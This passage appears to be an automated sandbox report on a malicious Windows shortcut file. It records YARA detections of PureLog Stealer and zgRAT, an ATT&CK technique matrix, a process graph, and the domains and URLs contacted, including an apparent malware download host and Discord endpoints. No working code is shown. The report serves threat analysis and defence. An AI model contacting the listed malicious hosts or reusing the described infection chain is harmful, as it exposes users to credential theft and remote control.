                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected zgRAT
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected zgRAT
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.powershell.exe.1f318711390.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.powershell.exe.1ccbebb1660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.233543815c0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fed130000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		21
                  Masquerading                  		OS Credential Dumping21
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		41
                  Virtualization/Sandbox Evasion                  		LSASS Memory12
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  Registry Run Keys / Startup Folder                  		12
                  Process Injection                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture5
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing                  		Cached Domain Credentials21
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522856 Sample: Sv6eQZzG0Z.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 50 drive.desktopserver.top 2->50 52 gateway.discord.gg 2->52 70 Malicious sample detected (through community Yara rule) 2->70 72 Windows shortcut file (LNK) starts blacklisted processes 2->72 74 Yara detected PureLog Stealer 2->74 76 7 other signatures 2->76 8 powershell.exe 14 32 2->8         started        12 powershell.exe 13 2->12         started        14 powershell.exe 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 62 drive.desktopserver.top 104.21.92.189, 443, 49725, 49731 CLOUDFLARENETUS United States 8->62 78 Windows shortcut file (LNK) starts blacklisted processes 8->78 80 Uses schtasks.exe or at.exe to add and modify task schedules 8->80 18 chrome.exe 21 8->18         started        21 powershell.exe 28 8->21         started        23 conhost.exe 1 8->23         started        25 powershell.exe 12->25         started        27 powershell.exe 14->27         started        64 127.0.0.1 unknown unknown 16->64 29 powershell.exe 16->29         started        signatures6 process7 dnsIp8 54 192.168.2.17 unknown unknown 18->54 56 192.168.2.4 unknown unknown 18->56 60 2 other IPs or domains 18->60 31 chrome.exe 18->31         started        58 gateway.discord.gg 162.159.135.234, 443, 49744, 49760 CLOUDFLARENETUS United States 21->58 34 schtasks.exe 1 21->34         started        36 schtasks.exe 1 21->36         started        38 schtasks.exe 1 21->38         started        40 schtasks.exe 1 25->40         started        44 2 other processes 25->44 46 3 other processes 27->46 42 schtasks.exe 1 29->42         started        48 2 other processes 29->48 process9 dnsIp10 66 mora.gov.pk 203.101.184.86, 443, 49726, 49727 CYBERNET-APCyberInternetServicesPvtLtdPK Pakistan 31->66 68 www.google.com 142.250.184.228, 443, 49737, 49767 GOOGLEUS United States 31->68

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Sv6eQZzG0Z.lnk11%ReversingLabs
                  Sv6eQZzG0Z.lnk100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://oneget.org0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  drive.desktopserver.top
                  		104.21.92.189
                  		truetrue
                    		unknown
                    www.google.com
                    		142.250.184.228
                    		truefalse
                      		unknown
                      gateway.discord.gg
                      		162.159.135.234
                      		truefalse
                        		unknown
                        mora.gov.pk
                        		203.101.184.86
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://gateway.discord.gg/?v=9&encording=jsonfalse
                            		unknown
                            http://drive.desktopserver.top/file/res/false
                              		unknown
                              https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdftrue
                                		unknown
                                file:///C:/Users/user/Downloads/downloaded.pdffalse
                                  		unknown
                                  https://drive.desktopserver.top/file/false
                                    		unknown
                                    https://mora.gov.pk/favicon.icofalse
                                      		unknown
                                      https://drive.desktopserver.top/file/res/false
                                        		unknown
                                        http://drive.desktopserver.top/file/true
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://drive.desktopserver.toppowershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334505E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334447A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334507A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAECA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF8A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F309408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://drive.desktopserver.top/file/res/0powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://go.micropowershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.microsoft.copowershell.exe, 00000016.00000002.2477439249.00000233425E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://drive.desktopsXHpowershell.exe, 00000018.00000002.2437118491.000001F3093F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.ver)svchost.exe, 00000004.00000002.3381154343.0000022298E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://drive.desktopsXpowershell.exe, 00000016.00000002.2485510234.0000023345068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.2166204153.0000022298CA0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                            		unknown
                                                            http://drive.desktoschtasks.exe, 0000000C.00000002.2230362976.00000276C5598000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmptrue
                                                              		unknown
                                                              http://gateway.discord.ggpowershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://drive.desktopserver.toppz8B3powershell.exe, 00000016.00000002.2485510234.00000233445BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://discord.com/api/v9/channels/powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf;Sv6eQZzG0Z.lnktrue
                                                                        		unknown
                                                                        https://discord.com/api/v9/guilds/powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
